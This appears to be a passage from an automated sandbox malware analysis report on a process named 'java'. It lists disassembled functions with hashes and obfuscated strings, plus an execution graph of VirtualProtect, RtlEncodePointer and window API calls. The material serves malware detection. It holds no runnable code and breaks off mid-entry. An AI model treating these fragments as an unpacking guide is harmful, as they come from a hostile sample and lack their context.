                                                            Function 02E968B7 Relevance: .0, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3dbddd8281d543f22dc65f21fda96ca2fce777bbb117f62683ceb520372ccd4a
                                                            • Instruction ID: c865de01628f69c69a37f9a420dc13ff16ed01fd50ca7b0618bf5c1eee7586f4
                                                            • Opcode Fuzzy Hash: 3dbddd8281d543f22dc65f21fda96ca2fce777bbb117f62683ceb520372ccd4a
                                                            • Instruction Fuzzy Hash: A7E086719093C80ECB516B70B47B0D83F65DB82208B4A4DEAC1458B596CE24190A8703
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E9840D Relevance: .0, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5ecda981aea161b48a1e03a507cba553748b0fba3e93e9b3ebebce544d5febc7
                                                            • Instruction ID: abfa83102a6fd56a9891bc6a872abc41f9c9f3864dafddcb94e5e0f22f2777a4
                                                            • Opcode Fuzzy Hash: 5ecda981aea161b48a1e03a507cba553748b0fba3e93e9b3ebebce544d5febc7
                                                            • Instruction Fuzzy Hash: D9D0677AB401089F8B14DF98E8448DDF7BAFB9C225B148516F925A3264C631A925DB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E9BF5D Relevance: .0, Instructions: 15COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: adb295b616d3720910be045e552fb45c6fbcfd2ae5a905e70696f1fb65c02bcc
                                                            • Instruction ID: 78a76380456b5117b750bc4ea1e5e78a7489fdfcbe499ad9c6ea9342604aa3db
                                                            • Opcode Fuzzy Hash: adb295b616d3720910be045e552fb45c6fbcfd2ae5a905e70696f1fb65c02bcc
                                                            • Instruction Fuzzy Hash: 32E09A7090115ACFCB94DFA8D894BDDB7B5AF85204F10D8EA901EB6224DA705E86CF20
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E9D981 Relevance: .0, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3d3342cb7bc15650bc042e9fa992df201acbcb0972e9ee7dac5f8e6e4dd0a65f
                                                            • Instruction ID: 968ad7a07bf8fe737be731e596cf06a335a7baf860711ccb8a4b4cb47714a5bc
                                                            • Opcode Fuzzy Hash: 3d3342cb7bc15650bc042e9fa992df201acbcb0972e9ee7dac5f8e6e4dd0a65f
                                                            • Instruction Fuzzy Hash: D4E08C30952354CFC768CF64C148898BBB2FF4A311F106498E4069B264CB35DA80CF00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E968C8 Relevance: .0, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 946a1b592bf4b800798dc7b014b4e4c6c1ad9af825727d62455b7fd9c2cdc4da
                                                            • Instruction ID: 5f4ee14f1ae8f5c4adc2e674401dd83a6508d826bf67a6dd69a89423d4f1f658
                                                            • Opcode Fuzzy Hash: 946a1b592bf4b800798dc7b014b4e4c6c1ad9af825727d62455b7fd9c2cdc4da
                                                            • Instruction Fuzzy Hash: EDC0123095120C4A8954BFB5F87A469339E9AC130D7848D64920D5A299DF7869044A86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 02E9F640 Relevance: 6.4, Strings: 5, Instructions: 184COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ?;)8$D*J$D*J$o0}$o0}
                                                            • API String ID: 0-1927398861
                                                            • Opcode ID: d73fef412fbee30e2f58eb94fab624780d5a9cd13f15fad824680ea3d498648e
                                                            • Instruction ID: 4289b7ba144236fc9f90eb2d44ea100ff277301f9da6a9f9b7e6663b4066c436
                                                            • Opcode Fuzzy Hash: d73fef412fbee30e2f58eb94fab624780d5a9cd13f15fad824680ea3d498648e
                                                            • Instruction Fuzzy Hash: B981AE74E152198FCB44CFA9C5849EEFBF2FB88310F24955AD415AB225D334AA42CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E96560 Relevance: 5.1, Strings: 4, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: K(i$K(i$K(i$K(i
                                                            • API String ID: 0-694474555
                                                            • Opcode ID: 26e3b17cee20feb991c29c7b6c36f84c92392cdc4fcc899c271b29e10ffd5657
                                                            • Instruction ID: 2eda14a5bb753747008b2882c799782837ed8e660de39f6924486e084751cb90
                                                            • Opcode Fuzzy Hash: 26e3b17cee20feb991c29c7b6c36f84c92392cdc4fcc899c271b29e10ffd5657
                                                            • Instruction Fuzzy Hash: 301182747042109F8B10EB7AD494A29B6DDAF89648355847EE609CB361EF61DC058791
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E9A148 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #i$#i$#i$#i
                                                            • API String ID: 0-2425302400
                                                            • Opcode ID: 5bd1501ab8688f5181a7b3f27dd8d39fea05c21366adcdaa5ea75551031916c5
                                                            • Instruction ID: 79021e66603810ef2b33001addcd78208546a0e2e652babd8720519ff76d207d
                                                            • Opcode Fuzzy Hash: 5bd1501ab8688f5181a7b3f27dd8d39fea05c21366adcdaa5ea75551031916c5
                                                            • Instruction Fuzzy Hash: 2F0184B17900108F8B649A2EC450A6A77EAAFD9B68715D17BE402CB3A4DB30DC41CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E9BC84 Relevance: 5.0, Strings: 4, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: KMRi$KMRi$n\?t$nt|
                                                            • API String ID: 0-3264837384
                                                            • Opcode ID: 89c64aae0bfada67b8f980f176f526f1269917000b3ba5d207ce04121c3d876a
                                                            • Instruction ID: 0902716ad504839cc5f88fb853d37b17e57c3350ad2a0e026350bbab75758222
                                                            • Opcode Fuzzy Hash: 89c64aae0bfada67b8f980f176f526f1269917000b3ba5d207ce04121c3d876a
                                                            • Instruction Fuzzy Hash: 3CF0F4B8E456098BDF24CFB5E5806DDB6B2AB48208F60A42FD011BB205DA708A41CF04
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:11.3%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:125
                                                            Total number of Limit Nodes:4
                                                            execution_graph 30262 64b1ecb 30263 64b1ece 30262->30263 30267 64b3b08 30263->30267 30270 64b3b01 30263->30270 30264 64b1f01 30268 64b3b50 VirtualProtect 30267->30268 30269 64b3b8a 30268->30269 30269->30264 30271 64b3b50 VirtualProtect 30270->30271 30272 64b3b8a 30271->30272 30272->30264 30359 64b1a29 30360 64b1a2c 30359->30360 30361 64b19f3 30359->30361 30361->30359 30362 64b3b08 VirtualProtect 30361->30362 30363 64b3b01 VirtualProtect 30361->30363 30362->30361 30363->30361 30282 64b169c 30284 64b3b08 VirtualProtect 30282->30284 30285 64b3b01 VirtualProtect 30282->30285 30283 64b16af 30284->30283 30285->30283 30286 64b1b11 30287 64b1adb 30286->30287 30288 64b1b14 30286->30288 30290 64b3b08 VirtualProtect 30287->30290 30291 64b3b01 VirtualProtect 30287->30291 30289 64b1ae9 30290->30289 30291->30289 30368 64b61f0 30369 64b6204 30368->30369 30370 64b620d 30369->30370 30372 64b6582 30369->30372 30379 64b6659 30372->30379 30383 64b6764 30372->30383 30387 64b67e0 30372->30387 30392 64b677e 30372->30392 30396 64b6668 30372->30396 30373 64b658b 30373->30370 30380 64b66ac 30379->30380 30381 64b67a3 30380->30381 30400 64b6a61 30380->30400 30384 64b6717 30383->30384 30385 64b67a3 30384->30385 30386 64b6a61 2 API calls 30384->30386 30386->30385 30388 64b67e6 30387->30388 30413 64b6d18 30388->30413 30417 64b6d28 30388->30417 30391 64b67f8 30391->30373 30393 64b6791 30392->30393 30394 64b67a3 30392->30394 30395 64b6a61 2 API calls 30393->30395 30395->30394 30397 64b66ac 30396->30397 30398 64b67a3 30397->30398 30399 64b6a61 2 API calls 30397->30399 30399->30398 30401 64b6a7e 30400->30401 30405 64b6ac0 30401->30405 30409 64b6ab0 30401->30409 30402 64b6a8e 30402->30381 30406 64b6afa 30405->30406 30407 64b6b24 RtlEncodePointer 30406->30407 30408 64b6b4d 30406->30408 30407->30408 30408->30402 30410 64b6afa 30409->30410 30411 64b6b24 RtlEncodePointer 30410->30411 30412 64b6b4d 30410->30412 30411->30412 30412->30402 30414 64b6d36 30413->30414 30421 64b6d60 30414->30421 30415 64b6d46 30415->30391 30418 64b6d36 30417->30418 30420 64b6d60 RtlEncodePointer 30418->30420 30419 64b6d46 30419->30391 30420->30419 30422 64b6da9 30421->30422 30423 64b6dcf RtlEncodePointer 30422->30423 30424 64b6df8 30422->30424 30423->30424 30424->30415 30277 64b2447 30278 64b244c 30277->30278 30280 64b3b08 VirtualProtect 30278->30280 30281 64b3b01 VirtualProtect 30278->30281 30279 64b2461 30280->30279 30281->30279 30292 bcc2750 30293 bcc2776 30292->30293 30296 bcc1474 30293->30296 30297 bcc147f 30296->30297 30298 bcc3499 30297->30298 30300 bcc3489 30297->30300 30321 bcc159c 30298->30321 30305 bcc35b0 30300->30305 30310 bcc35c0 30300->30310 30315 bcc368c 30300->30315 30301 bcc3497 30307 bcc35d4 30305->30307 30306 bcc3660 30306->30301 30325 bcc3668 30307->30325 30328 bcc3678 30307->30328 30312 bcc35d4 30310->30312 30311 bcc3660 30311->30301 30313 bcc3668 CallWindowProcW 30312->30313 30314 bcc3678 CallWindowProcW 30312->30314 30313->30311 30314->30311 30316 bcc369a 30315->30316 30317 bcc364a 30315->30317 30319 bcc3668 CallWindowProcW 30317->30319 30320 bcc3678 CallWindowProcW 30317->30320 30318 bcc3660 30318->30301 30319->30318 30320->30318 30322 bcc15a7 30321->30322 30323 bcc4bda CallWindowProcW 30322->30323 30324 bcc4b89 30322->30324 30323->30324 30324->30301 30326 bcc3689 30325->30326 30331 bcc4b12 30325->30331 30326->30306 30329 bcc3689 30328->30329 30330 bcc4b12 CallWindowProcW 30328->30330 30329->30306 30330->30329 30332 bcc159c CallWindowProcW 30331->30332 30333 bcc4b2a 30332->30333 30333->30326 30334 bcc0690 30336 bcc07b3 30334->30336 30337 bcc06c1 30334->30337 30335 bcc06cd 30337->30335 30339 bcc17a8 30337->30339 30340 bcc17d2 30339->30340 30341 bcc1879 30340->30341 30344 bcc2548 30340->30344 30347 bcc2440 30340->30347 30355 bcc144c 30344->30355 30348 bcc24ad 30347->30348 30348->30341 30349 bcc254e 30348->30349 30350 bcc2586 CreateWindowExW 30348->30350 30351 bcc257d 30349->30351 30352 bcc144c CreateWindowExW 30349->30352 30354 bcc26bc 30350->30354 30351->30341 30352->30351 30354->30354 30356 bcc2598 CreateWindowExW 30355->30356 30358 bcc26bc 30356->30358 30358->30358

                                                            Executed Functions

                                                            Function 02B169B0 Relevance: 4.7, Strings: 3, Instructions: 979COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: D0(i$D0(i$D0(i
                                                            • API String ID: 0-1169208932
                                                            • Opcode ID: febdf03ff2b8b6dbb94a480a93d5714cc2c61cf63884739e519d097eccdb7c9a
                                                            • Instruction ID: 6e157253a760d9727a2a96119e3ce5baac3f255bdf83039425884ef599818680
                                                            • Opcode Fuzzy Hash: febdf03ff2b8b6dbb94a480a93d5714cc2c61cf63884739e519d097eccdb7c9a
                                                            • Instruction Fuzzy Hash: 46826070A001198FDB14DF69C884AAEBBB6FF89304F6484A9E805DB395DF34DD42DB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1E720 Relevance: 2.8, Strings: 2, Instructions: 308COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 430 2b1e720-2b1e745 431 2b1e747 430->431 432 2b1e74c-2b1e769 430->432 431->432 433 2b1e771 432->433 434 2b1e778-2b1e794 433->434 435 2b1e796 434->435 436 2b1e79d-2b1e79e 434->436 435->433 435->436 437 2b1e8f3-2b1e905 435->437 438 2b1ea33-2b1ea37 435->438 439 2b1eab2-2b1eab6 435->439 440 2b1eb72-2b1eb79 435->440 441 2b1e977-2b1e983 435->441 442 2b1e87f-2b1e883 435->442 443 2b1e7a3-2b1e7bb 435->443 444 2b1ea63-2b1ea6f 435->444 445 2b1e9e2-2b1e9eb 435->445 446 2b1eae2-2b1eaee 435->446 447 2b1e829-2b1e83b 435->447 448 2b1e9ab-2b1e9b7 435->448 449 2b1e8af-2b1e8c1 435->449 450 2b1e817-2b1e824 435->450 451 2b1ea17-2b1ea2e 435->451 452 2b1e7d6-2b1e7fb 435->452 453 2b1eb19-2b1eb32 call 2b1ed90 435->453 454 2b1e95b-2b1e972 435->454 455 2b1e85a-2b1e87a 435->455 456 2b1e840-2b1e855 435->456 457 2b1e800-2b1e812 435->457 458 2b1e8c6-2b1e8d2 435->458 459 2b1e90a-2b1e916 435->459 460 2b1ea8d-2b1ea93 435->460 461 2b1eb4f-2b1eb6d 435->461 436->440 437->434 468 2b1ea39-2b1ea48 438->468 469 2b1ea4a-2b1ea51 438->469 474 2b1eac9-2b1ead0 439->474 475 2b1eab8-2b1eac7 439->475 462 2b1e985 441->462 463 2b1e98a-2b1e9a6 441->463 478 2b1e885-2b1e894 442->478 479 2b1e896-2b1e89d 442->479 472 2b1e7c2-2b1e7d4 443->472 473 2b1e7bd 443->473 470 2b1ea71 444->470 471 2b1ea76-2b1ea88 444->471 466 2b1e9ed-2b1e9fc 445->466 467 2b1e9fe-2b1ea05 445->467 476 2b1eaf0 446->476 477 2b1eaf5-2b1eb14 446->477 447->434 464 2b1e9b9 448->464 465 2b1e9be-2b1e9dd 448->465 449->434 450->434 451->434 452->434 491 2b1eb38-2b1eb4a 453->491 454->434 455->434 456->434 457->434 480 2b1e8d4 458->480 481 2b1e8d9-2b1e8ee 458->481 482 2b1e918 459->482 483 2b1e91d-2b1e933 459->483 486 2b1ea9b-2b1eaad 460->486 461->434 462->463 463->434 464->465 465->434 484 2b1ea0c-2b1ea12 466->484 467->484 485 2b1ea58-2b1ea5e 468->485 469->485 470->471 471->434 472->434 473->472 487 2b1ead7-2b1eadd 474->487 475->487 476->477 477->434 490 2b1e8a4-2b1e8aa 478->490 479->490 480->481 481->434 482->483 500 2b1e935 483->500 501 2b1e93a-2b1e956 483->501 484->434 485->434 486->434 487->434 490->434 491->434 500->501 501->434
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: *LM$Cn3;
                                                            • API String ID: 0-700852315
                                                            • Opcode ID: aadfa136698af2342a701020a0def1eb7fd23524f7ce5b621e2688a989f3972b
                                                            • Instruction ID: 59aefd8c5dbad29a99b8bf5ccfadfe1e9d5fe38d8d98ebe8543ed018d083b4df
                                                            • Opcode Fuzzy Hash: aadfa136698af2342a701020a0def1eb7fd23524f7ce5b621e2688a989f3972b
                                                            • Instruction Fuzzy Hash: F7D17970D1021ADFDB04CF96C4858AEFBB2FF89300BA49599D915BB254DB34EA42CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1BB98 Relevance: 2.6, Strings: 2, Instructions: 72COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 602 2b1bb98-2b1bbb9 603 2b1bbc0-2b1bc19 602->603 604 2b1bbbb 602->604 605 2b1bc23-2b1bc75 603->605 604->603 609 2b1bc77 605->609 610 2b1bc7e-2b1c676 605->610 609->610
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: n\?t$nt|
                                                            • API String ID: 0-1638278369
                                                            • Opcode ID: 54f3445f0d9e8b4b93ebe887e1b0834e1e7f451d1f8a7362012f82b408950d9b
                                                            • Instruction ID: 7b0cce9492793bf248322f150a77e37403f832d27b8d3dd6f10d0ef74436ccb4
                                                            • Opcode Fuzzy Hash: 54f3445f0d9e8b4b93ebe887e1b0834e1e7f451d1f8a7362012f82b408950d9b
                                                            • Instruction Fuzzy Hash: 9D21D871E016189BEB18CFABD8406DEFAF7AFC9200F14C0BAD508A7354EB341A458F51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1BB89 Relevance: 2.6, Strings: 2, Instructions: 65COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 612 2b1bb89-2b1bbb9 613 2b1bbc0-2b1bc19 612->613 614 2b1bbbb 612->614 615 2b1bc23-2b1bc75 613->615 614->613 619 2b1bc77 615->619 620 2b1bc7e-2b1c676 615->620 619->620
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: n\?t$nt|
                                                            • API String ID: 0-1638278369
                                                            • Opcode ID: cbadee03d37acd53c919063e0bc6434001db8b7477ff89887431322fd3b2ba81
                                                            • Instruction ID: 5478c5fdfcf3e46e1c3e22cdd5e22db382b13650e32b2925b0d9bdf662ea033b
                                                            • Opcode Fuzzy Hash: cbadee03d37acd53c919063e0bc6434001db8b7477ff89887431322fd3b2ba81
                                                            • Instruction Fuzzy Hash: AA21BF71E016189BEB18CFABD94069EFAF7AFC8204F14C4BAD408A6354EB345A458F51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B140E8 Relevance: 1.5, Strings: 1, Instructions: 210COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `'i
                                                            • API String ID: 0-1972283105
                                                            • Opcode ID: 82f4ef691aa979506b0f151473c40da54058e4a865d29cbb68edc13e5d7448a4
                                                            • Instruction ID: 257daa3794c9a27ab5f8add315ca1b43d52367fea3ac07959f1ddf59dcfd6384
                                                            • Opcode Fuzzy Hash: 82f4ef691aa979506b0f151473c40da54058e4a865d29cbb68edc13e5d7448a4
                                                            • Instruction Fuzzy Hash: 2C81E074E01218CFCB18DFA9D8846EDFBB2BF89308F649569D414BB254DB349986CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B14910 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `'i
                                                            • API String ID: 0-1972283105
                                                            • Opcode ID: 689f808cab9e18b4f569c1be8c5d117d308665ec8c5cc189f8012951ab6ae2b2
                                                            • Instruction ID: caee1c65ac0c5257077e9350eb03fb822d37e0eea6ac1f93a804c13d566fed82
                                                            • Opcode Fuzzy Hash: 689f808cab9e18b4f569c1be8c5d117d308665ec8c5cc189f8012951ab6ae2b2
                                                            • Instruction Fuzzy Hash: A851C2B4E002188FCB08DFAAD8845DEFBB6BF88314F54C569E418AB354DB309942CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B177D8 Relevance: .9, Instructions: 882COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6218733e1e4979fe2a4df7dae35a8cc6d1611474a2f056310ed5fa82750aac8a
                                                            • Instruction ID: f61d55d9d3136f93fcecded4d0ebcd66c44764fb6179c58d7482e311ab26b401
                                                            • Opcode Fuzzy Hash: 6218733e1e4979fe2a4df7dae35a8cc6d1611474a2f056310ed5fa82750aac8a
                                                            • Instruction Fuzzy Hash: CA827E70A00509DFDB15DFA8C884AAEBBF6FF48314F558599E446EB2A1CB30ED41CB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B14B08 Relevance: .3, Instructions: 257COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5a43e15bfd644e7eb21c625a043fda180febecc358aa5a0f076b942d5862101a
                                                            • Instruction ID: b59ef4b9becaed5ea2ed76bd84ac3ae8147fd412290c16824ff2d863d1a08c9b
                                                            • Opcode Fuzzy Hash: 5a43e15bfd644e7eb21c625a043fda180febecc358aa5a0f076b942d5862101a
                                                            • Instruction Fuzzy Hash: 61C1EF74E002189FDB14DFA6C944BDEBBB6FF89304F1484A9E408AB265DB349E81CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B14AF9 Relevance: .2, Instructions: 232COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e77ce520674bbd2a27ff8d4cfdaed5f0937f86a5d2133117f2b7539fa3892a6c
                                                            • Instruction ID: 097dea6424ea929cf077f01622cfe1f1a723ed0b195a9fba540664994226a4c6
                                                            • Opcode Fuzzy Hash: e77ce520674bbd2a27ff8d4cfdaed5f0937f86a5d2133117f2b7539fa3892a6c
                                                            • Instruction Fuzzy Hash: 71B1CF74E002189FDB14DFA6C944B9EFBB6EF89304F1484A9E408AB355DB359E82CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1C703 Relevance: .2, Instructions: 206COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eb6eab003f7ba48c1c78a3005e5f1aeea5aa5737b0586d02125ff3d7d69855b7
                                                            • Instruction ID: 22e4ef88ebd0be7fcd15de3fe5527a4fbaaea86ac1ee789ca0af24bff770259b
                                                            • Opcode Fuzzy Hash: eb6eab003f7ba48c1c78a3005e5f1aeea5aa5737b0586d02125ff3d7d69855b7
                                                            • Instruction Fuzzy Hash: B291C274E102098FDB08CFAAC985A9EFBB2AF89310F14942AD419BB364D7749905CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1C720 Relevance: .2, Instructions: 201COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4b5bcad927441a558c8913024862ed065e825519969d2b7a9d057e31f921163a
                                                            • Instruction ID: 635d51dff690aba9ea79e8fa276e0129af302bdd39879989a17a7d7a3381f1c9
                                                            • Opcode Fuzzy Hash: 4b5bcad927441a558c8913024862ed065e825519969d2b7a9d057e31f921163a
                                                            • Instruction Fuzzy Hash: 6E81B174E102098FCB08CFEAC984AAEFBB2AF89310F14942AD519BB364D7749945CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1CEA8 Relevance: .1, Instructions: 144COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 56e9508f4183470eb7f64e2628a7ba758b878e56e2938086bb94462f3fd5f642
                                                            • Instruction ID: f0c99dde00458a77d3ac9194bbc14e5af943fb4eab8862c66f302b775fd53231
                                                            • Opcode Fuzzy Hash: 56e9508f4183470eb7f64e2628a7ba758b878e56e2938086bb94462f3fd5f642
                                                            • Instruction Fuzzy Hash: 4B5108B0E04619CFDB08CFAAD8446AEFBF2BF89300F14D56AD409A7254D7349A42CF95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1CEB8 Relevance: .1, Instructions: 143COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
